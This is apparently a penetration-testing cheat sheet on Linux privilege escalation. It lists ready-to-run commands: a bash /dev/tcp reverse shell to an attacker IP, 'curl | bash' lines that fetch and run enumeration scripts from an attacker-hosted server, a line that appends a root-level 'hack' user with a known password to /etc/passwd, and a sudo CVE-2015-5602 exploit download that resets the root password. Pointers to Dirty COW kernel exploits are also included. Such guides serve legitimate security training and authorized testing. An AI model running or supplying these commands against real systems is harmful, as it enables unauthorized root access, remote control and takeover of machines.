Linux Privilege Escalation

This page provides a comprehensive guide for Linux privilege escalation and exploitation techniques, including practical commands, tools, and tips. Use these methods to enumerate, exploit, and escalate privileges on Linux systems during penetration testing.

Shell Handling Techniques

Reverse Shell

• Attacker's machine (waiting for connection):

nc -nvlp {port}

• Target's machine (connect to attacker):

bash -i >& /dev/tcp/{ip}/{port} 0>&1
# Example:
bash -i >& /dev/tcp/192.168.119.1/443 0>&1

Fixing PATH Issues

If you get a shell with a limited PATH, restore it with:

export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Upgrading to a PTY Shell

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

Or try:

{ which python; } && { python -c 'import pty ; pty.spawn("/bin/bash")'; :; } || { echo "No python"; { which python3; } && { python3 -c 'import pty ; pty.spawn("/bin/bash")'; :; } || { echo "No python3"; } }

Basic System Enumeration

whoami
uname -a

Automated Enumeration Tools

linpeas.sh

• linPEAS GitHub
• Automated privilege escalation auditing script.

wget http://192.168.119.1:8080/f/linpeas.sh -O linpeas.sh
curl http://192.168.119.1:8080/f/linpeas.sh -o linpeas.sh
bash ./linpeas.sh
# Or run directly:
curl http://192.168.119.1:8080/f/linpeas.sh | bash

lse.sh

• LSE GitHub
• Linux Smart Enumeration script.

wget http://192.168.119.1:8080/f/lse.sh -O lse.sh
curl http://192.168.119.1:8080/f/lse.sh -o lse.sh
bash ./lse.sh
# Or run directly:
curl http://192.168.119.1:8080/f/lse.sh | bash

LinEnum.sh

• LinEnum GitHub
• Another popular Linux enumeration script.

wget http://192.168.119.1:8080/f/LinEnum.sh -O LinEnum.sh
curl http://192.168.119.1:8080/f/LinEnum.sh -o LinEnum.sh
bash ./LinEnum.sh
# Or run directly:
curl http://192.168.119.1:8080/f/LinEnum.sh | bash

pspy

• pspy GitHub
• Process monitoring tool for Linux, useful for finding scheduled tasks and privilege escalation vectors.

Check your architecture:

uname -m
# x86_64 (64bit), i686 (32bit)

Download and run:

wget http://192.168.119.1:8080/f/pspy32 -O pspy32
curl http://192.168.119.1:8080/f/pspy32 -o pspy32
chmod +x pspy32
./pspy32

wget http://192.168.119.1:8080/f/pspy64 -O pspy64
curl http://192.168.119.1:8080/f/pspy64 -o pspy64
chmod +x pspy64
./pspy64

SUID Exploitation

• HackTricks SUID Guide

/etc/passwd Trick

• Editing /etc/passwd for Privilege Escalation

echo -n "hack:\$1\$hack\$22.CgYt2uMolqeatCk9ih/:0:0:root:/root:/bin/bash" >> /etc/passwd
su hack
# Password: pass123
# (No output, but you can run 'whoami' to check)

Kernel Exploits

Linux Exploit Suggester 2

• Tool to suggest kernel exploits based on version.

./linux-exploit-suggester-2.pl -k 4.4.10

Compiling 32bit Exploits

sudo apt install -y gcc-multilib
gcc exploit.c -Wl,--hash-style=both -m32 -o exploit.elf

Dirty COW (Linux 2.6.22 < 3.9)

• Exploit-DB 40616
• Exploit-DB 40839
• If attacking x86, change shellcode accordingly.

sudo <= 1.8.14 Exploit (CVE-2015-5602)

wget https://raw.githubusercontent.com/t0kx/privesc-CVE-2015-5602/master/exploit.sh

Example usage:

sudo -l
# Check for NOPASSWD sudoedit permissions
./exploit.sh
# If successful, root password will be changed
su
# Password: (see exploit output)
id

Further Reading & References

• Udemy: Linux Privilege Escalation
• Japanese: Privilege Escalation Memo
• Japanese: Privilege Escalation Exploit Linux